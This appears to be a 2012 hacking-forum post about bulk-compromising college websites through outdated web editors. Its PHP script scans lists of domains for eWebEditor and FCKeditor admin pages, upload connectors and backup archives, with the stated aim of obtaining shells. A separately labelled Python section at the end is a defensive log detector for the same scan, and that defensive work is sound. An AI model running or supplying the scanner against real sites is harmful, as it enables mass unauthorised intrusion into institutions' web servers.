Bulk compromise of college websites: vulnerability EXP - Vulnerability warning - the black bar safety net

ID MYHACK58:62201235023
Type myhack58
Reporter Anonymous
Modified 2012-09-25T00:00:00


By: deleter QQ: 1343382392

College websites mostly run on a modified CMS, and a CMS always ships with an editor. Current editors have few vulnerabilities and are relatively safe, but college websites are a different case. A college website is bound to be a year old, unless it belongs to a newly established university or academy, so the probability that its CMS contains a vulnerable editor is very high. Therefore, we can bulk-scan for the editor to get a shell.

Our aim is to take sites in bulk. Following this idea, we can use the script below for batch scanning.

EXP attached:

<?php
//Coded by deleter
$f = fopen("scan_in.txt", 'r');
$fw = fopen("scan_out.txt", 'a');
$arr = array(
    "/admin/editor/admin_login.asp",
    "/manege/ewebeditor/admin_login.asp",
    "/data/ewebeditor/admin_login.asp",
    "/ewindoweditor/admin_login.asp",
    "/webeditor/admin_login.asp",
    "/Edit/eWebEditor.asp",
    "/system/eWebEditor/",
    "/admin/fckeditor/editor/filemanager/connectors/",
    "/fckeditor/editor/filemanager/connectors/",
    "/admin/FCKeditor/editor/filemanager/connectors/",
    "/manage/FCKeditor/editor/filemanager/connectors/",
    "/web_admin/editor/",
    "/ewebeditor/",
    "/wwwroot.rar",
    "/admin/webeditor/admin_login.asp"
);
$url = trim(fgets($f));
while(!feof($f) && (!empty($url))){
    foreach($arr as $key => $value){
        $request = 'http://'.$url.$value;
        //Request the file
        $html = file_get_contents($request);
        //Returns the HTTP status code
        echo $request."\n";
        list($version,$status_code,$msg) = explode(' ',$http_response_header[0], 3);
        if($status_code=='200' || $status_code=='403'){
            fwrite($fw, $request."\n");
        }
    }
    $url = trim(fgets($f));
}
fclose($f);
fclose($fw);
?>
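For site operators, the request pattern of the script above is easy to find in a web server access log. The following is an added example, not part of the original post: it flags any client that requested several of the listed paths and reports which of them answered 200 or 403, the statuses the script records as hits. The function name, the threshold, the common/combined log layout and the sample log lines are assumptions made for this illustration.

```python
import re
from collections import defaultdict

# Paths requested by the script on this page; compared case-insensitively.
PROBES = {p.lower() for p in (
    "/admin/editor/admin_login.asp", "/manege/ewebeditor/admin_login.asp",
    "/data/ewebeditor/admin_login.asp", "/ewindoweditor/admin_login.asp",
    "/webeditor/admin_login.asp", "/Edit/eWebEditor.asp", "/system/eWebEditor/",
    "/admin/fckeditor/editor/filemanager/connectors/",
    "/fckeditor/editor/filemanager/connectors/",
    "/manage/FCKeditor/editor/filemanager/connectors/",
    "/web_admin/editor/", "/ewebeditor/", "/wwwroot.rar",
    "/admin/webeditor/admin_login.asp")}
# Assumed log layout (common/combined): ip - - [time] "METHOD target PROTO" status ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (\S+)[^"]*" (\d{3})')

def find_editor_scans(lines, min_distinct=5):
    """Map client IP -> {"probed", "exposed"} for clients that requested at
    least min_distinct probe paths. "exposed" lists the paths answered with
    200 or 403, the two statuses the script writes to scan_out.txt."""
    seen = defaultdict(lambda: {"probed": set(), "exposed": set()})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # line is not in the assumed layout
        ip, target, status = m.groups()
        path = target.split("?", 1)[0].lower()
        if path in PROBES:
            seen[ip]["probed"].add(path)
            if status in ("200", "403"):
                seen[ip]["exposed"].add(path)
    return {ip: hit for ip, hit in seen.items() if len(hit["probed"]) >= min_distinct}

# Constructed sample log: one scanning client and one ordinary visitor.
_FMT = '{} - - [25/Sep/2012:10:00:00 +0800] "GET {} HTTP/1.0" {} 0'
SAMPLE_LOG = [_FMT.format(*row) for row in (
    ("203.0.113.7", "/admin/editor/admin_login.asp", 404),
    ("203.0.113.7", "/ewebeditor/", 403),
    ("203.0.113.7", "/fckeditor/editor/filemanager/connectors/", 200),
    ("203.0.113.7", "/wwwroot.rar", 404),
    ("203.0.113.7", "/Edit/eWebEditor.asp", 404),
    ("203.0.113.7", "/web_admin/editor/", 404),
    ("198.51.100.20", "/index.asp", 200),
    ("198.51.100.20", "/ewebeditor/", 403),
)]

if __name__ == "__main__":
    for ip, hit in find_editor_scans(SAMPLE_LOG).items():
        print(ip, len(hit["probed"]), "probe paths; reachable:", sorted(hit["exposed"]))
```

Any path reported as reachable is one the scan would have written to its output file, so those editor directories and backup archives are the first things to remove or restrict.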
